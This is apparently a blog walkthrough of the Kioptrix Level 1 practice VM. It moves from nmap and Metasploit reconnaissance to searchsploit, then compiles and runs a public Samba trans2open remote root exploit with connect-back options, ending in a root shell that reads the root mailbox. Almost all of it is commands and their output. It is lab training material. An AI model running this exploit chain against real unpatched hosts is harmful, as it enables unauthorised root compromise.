Kioptrix Level 1 Walkthrough

This is a walkthrough of the intentionally vulnerable machine Kioptrix. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

So let’s get to it, first, we want to either run netdiscover or do an nmap scan to find the IP address of the target machine.

root@kali:~# nmap -sS
Nmap scan report for
Host is up (0.00014s latency).
Not shown: 994 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
32768/tcp open filenet-tms
MAC Address: 08:00:27:97:A3:11 (Oracle VirtualBox virtual NIC)

Now that we’ve found the IP address of the target machine, we can run an nmap version scan to try to find out more information about the open ports.

root@kali:~# nmap -sV
Starting Nmap 7.70 ( ) at 2019-02-22 18:53 CST
Nmap scan report for
Host is up (0.00013s latency).
Not shown: 994 closed ports
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: ukOMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:97:A3:11 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 17.20 seconds

We can see that it’s running Samba but it doesn’t give us the version. So, let’s fire up metasploit and run an smb auxiliary scanner to find the version number so we can check to see if it might be exploitable.

root@kali:~# msfconsole
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS
msf5 auxiliary(scanner/smb/smb_version) > exploit

[] – Host could not be identified: Unix (Samba 2.2.1a) [] – Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_version) >

We can see that the version of Samba the machine is running is Samba 2.2.1a. All we need to do to check if there is an available exploit is to use searchsploit from the command line.

root@kali:~# searchsploit samba 2.2

Samba 2.0.x/2.2 – Arbitrary File Creat | exploits/unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) – trans2open | exploits/osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 – ‘nttrans’ Remote | exploits/linux/remote/16321.rb
Samba 2.2.8 (BSD x86) – ‘trans2open’ R | exploits/bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian | exploits/linux/local/23674.txt
Samba 2.2.8 (Linux x86) – ‘trans2open’ | exploits/linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) – ‘trans2open’ R | exploits/osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) – ‘trans2o | exploits/solaris_sparc/remote/16330.rb
Samba 2.2.8 – Brute Force Method Remot | exploits/linux/remote/55.c
Samba 2.2.x – ‘call_trans2open’ Remote | exploits/unix/remote/22468.c
Samba 2.2.x – ‘call_trans2open’ Remote | exploits/unix/remote/22469.c
Samba 2.2.x – ‘call_trans2open’ Remote | exploits/unix/remote/22470.c
Samba 2.2.x – ‘call_trans2open’ Remote | exploits/unix/remote/22471.txt
Samba 2.2.x – ‘nttrans’ Remote Overflo | exploits/linux/remote/9936.rb
Samba 2.2.x – CIFS/9000 Server A.01.x | exploits/unix/remote/22356.c
Samba 2.2.x – Remote Buffer Overflow | exploits/linux/remote/
Samba < 2.2.8 (Linux/BSD) – Remote Cod | exploits/multiple/remote/10.c

The very bottom exploit seems to be exactly what we are looking for as it targets any Samba version under 2.2.8! So, let’s compile that exploit and run it against our target.

root@kali:~# cp /usr/share/exploitdb/exploits/multiple/remote/10.c 10.c
root@kali:~# gcc 10.c -o exploit10
root@kali:~# ./exploit10
samba-2.2.8 < remote root exploit by eSDee (|be)
Usage: ./exploit10 [-bBcCdfprsStv] [host]

-b bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B bruteforce steps (default = 300)
-c connectback ip address
-C max childs for scan/bruteforce mode (default = 40)
-d bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p port to attack (default = 139)
-r return address
-s scan mode (random)
-S scan mode
-t presets (0 for a list)
-v verbose mode
root@kali:~# ./exploit10 -b 0 -c

Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
cat /var/mail/root
From root Sat Sep 26 11:42:10 2009
Received: (from root@localhost)
by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O
If you are reading this, you got root. Congratulations.
Level 2 won’t be as easy‚Ķ

Leave a Reply

Your email address will not be published. Required fields are marked *